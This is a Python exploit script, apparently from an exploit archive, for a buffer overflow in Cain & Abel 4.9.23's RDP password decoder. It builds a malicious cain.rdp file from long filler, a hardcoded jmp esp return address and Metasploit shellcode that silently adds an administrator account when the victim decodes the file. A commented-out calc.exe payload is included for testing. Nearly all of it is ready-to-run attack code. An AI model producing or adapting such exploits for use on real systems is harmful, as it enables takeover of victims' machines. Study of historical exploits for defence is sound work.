cainabel-overflow.txt

`#exploit.py  
print ""  
print " !R4Q!4N H4CK3R"  
print "Cain & Abel 4.9.23 (rdp file) Buffer overflow Exploit"  
print "By:Encrypt3d.M!nd"  
print "encrypt3d.blogspot.com"  
print "######################################################"  
print "Greetz:-=Mizo=-,L!0N,El Mariachi,MiNi SpIder..and all my friends"  
print "This is exploit for my PoC"  
print "Tested on:Windows Xp Sp3 Patched"  
print "This exploit will Create File(.rdp) and when decoding"  
print "The file with Cain(Remote Desktop Password Decoder)"  
print "Will Add administrator user(user) with password(pass)"  
print ""  
  
# win32_adduser - PASS=pass EXITFUNC=seh USER=user Size=232  
Encoder=PexFnstenvSub http://metasploit.com  
  
shellcode = "\x2b\xc9\x83\xe9\xcc\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x46"  
shellcode+= "\xcd\x10\x60\x83\xeb\xfc\xe2\xf4\xba\x25\x54\x60\x46\xcd\x9b\x25"  
shellcode+= "\x7a\x46\x6c\x65\x3e\xcc\xff\xeb\x09\xd5\x9b\x3f\x66\xcc\xfb\x29"  
shellcode+= "\xcd\xf9\x9b\x61\xa8\xfc\xd0\xf9\xea\x49\xd0\x14\x41\x0c\xda\x6d"  
shellcode+= "\x47\x0f\xfb\x94\x7d\x99\x34\x64\x33\x28\x9b\x3f\x62\xcc\xfb\x06"  
shellcode+= "\xcd\xc1\x5b\xeb\x19\xd1\x11\x8b\xcd\xd1\x9b\x61\xad\x44\x4c\x44"  
shellcode+= "\x42\x0e\x21\xa0\x22\x46\x50\x50\xc3\x0d\x68\x6c\xcd\x8d\x1c\xeb"  
shellcode+= "\x36\xd1\xbd\xeb\x2e\xc5\xfb\x69\xcd\x4d\xa0\x60\x46\xcd\x9b\x08"  
shellcode+= "\x7a\x92\x21\x96\x26\x9b\x99\x98\xc5\x0d\x6b\x30\x2e\x3d\x9a\x64"  
shellcode+= "\x19\xa5\x88\x9e\xcc\xc3\x47\x9f\xa1\xae\x7d\x04\x68\xa8\x68\x05"  
shellcode+= "\x66\xe2\x73\x40\x28\xa8\x64\x40\x33\xbe\x75\x12\x66\xb8\x63\x05"  
shellcode+= "\x34\xed\x60\x01\x35\xbe\x30\x4f\x07\x89\x54\x40\x60\xeb\x30\x0e"  
shellcode+= "\x23\xb9\x30\x0c\x29\xae\x71\x0c\x21\xbf\x7f\x15\x36\xed\x51\x04"  
shellcode+= "\x2b\xa4\x7e\x09\x35\xb9\x62\x01\x32\xa2\x62\x13\x66\xb8\x63\x05"  
shellcode+= "\x34\xed\x3f\x21\x02\x89\x10\x60";  
  
# and if you want to test it..this shellcode will open calc.exe  
#shellcode = "\x33\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xb2"  
#shellcode+= "\xab\x63\x3d\x83\xeb\xfc\xe2\xf4\x4e\x43\x27\x3d\xb2\xab\xe8\x78"  
#shellcode+= "\x8e\x20\x1f\x38\xca\xaa\x8c\xb6\xfd\xb3\xe8\x62\x92\xaa\x88\x74"  
#shellcode+= "\x39\x9f\xe8\x3c\x5c\x9a\xa3\xa4\x1e\x2f\xa3\x49\xb5\x6a\xa9\x30"  
#shellcode+= "\xb3\x69\x88\xc9\x89\xff\x47\x39\xc7\x4e\xe8\x62\x96\xaa\x88\x5b"  
#shellcode+= "\x39\xa7\x28\xb6\xed\xb7\x62\xd6\x39\xb7\xe8\x3c\x59\x22\x3f\x19"  
#shellcode+= "\xb6\x68\x52\xfd\xd6\x20\x23\x0d\x37\x6b\x1b\x31\x39\xeb\x6f\xb6"  
#shellcode+= "\xc2\xb7\xce\xb6\xda\xa3\x88\x34\x39\x2b\xd3\x3d\xb2\xab\xe8\x55"  
#shellcode+= "\x8e\xf4\x52\xcb\xd2\xfd\xea\xc5\x31\x6b\x18\x6d\xda\x5b\xe9\x39"  
#shellcode+= "\xed\xc3\xfb\xc3\x38\xa5\x34\xc2\x55\xc8\x02\x51\xd1\x85\x06\x45"  
#shellcode+= "\xd7\xab\x63\x3d";  
  
eip = "\xB7\x2F\x49\x7E" #user32.dll jmp esp 0x7E492FB7  
  
chars = "E"*8206  
print "Bu!ld!ng 3xpl0!t....Pl3453 W4!t"  
print ""  
file = open('cain.rdp','w')  
file.write (chars+eip+eip+"\x90"*10+shellcode)  
file.close()  
print "D0NE!"  
  
`